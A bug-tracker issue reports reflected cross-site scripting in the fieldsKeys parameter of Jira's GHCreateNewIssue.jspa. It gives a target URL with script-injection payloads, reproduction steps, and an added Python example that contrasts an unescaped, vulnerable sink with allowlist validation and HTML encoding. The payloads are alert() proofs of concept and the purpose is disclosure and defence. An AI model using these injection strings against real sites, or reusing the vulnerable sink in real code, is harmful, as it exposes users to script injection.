XSS (reflected) in fieldsKeys parameter of GHCreateNewIssue.jspa


    • 5.1

      Targets: https://test01.jira-dev.com/secure/GHCreateNewIssue.jspa?key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,fixVersions,components,customfield_10005,assignee,customfield_10004,reporter,customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606&fieldsValues=1@%@ @%@XSS"><script>alert('XSS')</script>@%@-1@%@-1@%@1000@%@0@%@100@%@isecpartners@%@iSEC"><script>alert('XSS')</script>&forcedFieldsKeys=&forcedFieldsValues=&createNext=false&projectId=&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1
      Reproduction:
      After logging in, open the target URL in a browser.
      Apply the attack value "><script>alert('XSS')</script> in the fieldsKeys parameter.
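
The check that would stop this reflection, as an added example (not Atlassian's code and not the fix that shipped): each entry of the comma-separated fieldsKeys list is validated against an allowlist pattern, and whatever is written back into the page is HTML-encoded. The key pattern, the hidden-input sink and all function names are assumptions; the sample query is shortened from the target URL above.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: the query string of the target URL above, shortened.
SAMPLE_QUERY = (
    "key=&issueType=7&fieldsKeys=priority,customfield_10006,summary,"
    "customfield_100039fd29<script>alert('XSS')</script>15d31825f8e9d6606"
    "&decorator=none&selectedProjectId=10000"
)

# Assumption: a field key is a built-in name (letters only) or customfield_<digits>.
FIELD_KEY_RE = re.compile(r"[A-Za-z]+|customfield_\d{1,10}")


def raw_field_keys(query):
    """Return the decoded fieldsKeys value, or '' when the parameter is absent."""
    return parse_qs(query).get("fieldsKeys", [""])[0]


def split_field_keys(raw):
    """Split the comma-separated list into (accepted, rejected) keys."""
    accepted, rejected = [], []
    for key in filter(None, raw.split(",")):
        (accepted if FIELD_KEY_RE.fullmatch(key) else rejected).append(key)
    return accepted, rejected


def render_reflected(raw):
    """Hypothetical vulnerable sink: the value is echoed into markup unchanged."""
    return '<input type="hidden" name="fieldsKeys" value="' + raw + '">'


def render_hardened(raw):
    """Drop keys that fail the allowlist, then HTML-encode what is written out."""
    accepted, _ = split_field_keys(raw)
    return ('<input type="hidden" name="fieldsKeys" value="'
            + html.escape(",".join(accepted), quote=True) + '">')


if __name__ == "__main__":
    raw = raw_field_keys(SAMPLE_QUERY)
    print("rejected keys:", split_field_keys(raw)[1])
    print("reflected:", render_reflected(raw))
    print("hardened: ", render_hardened(raw))
```

The rejected list is what a server would log or answer with an error; encoding stays in place even for accepted keys so the output is safe if the pattern is later loosened.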

            Assignee:
            Unassigned
            Reporter:
            David Black
            Votes:
            0
            Watchers:
            3
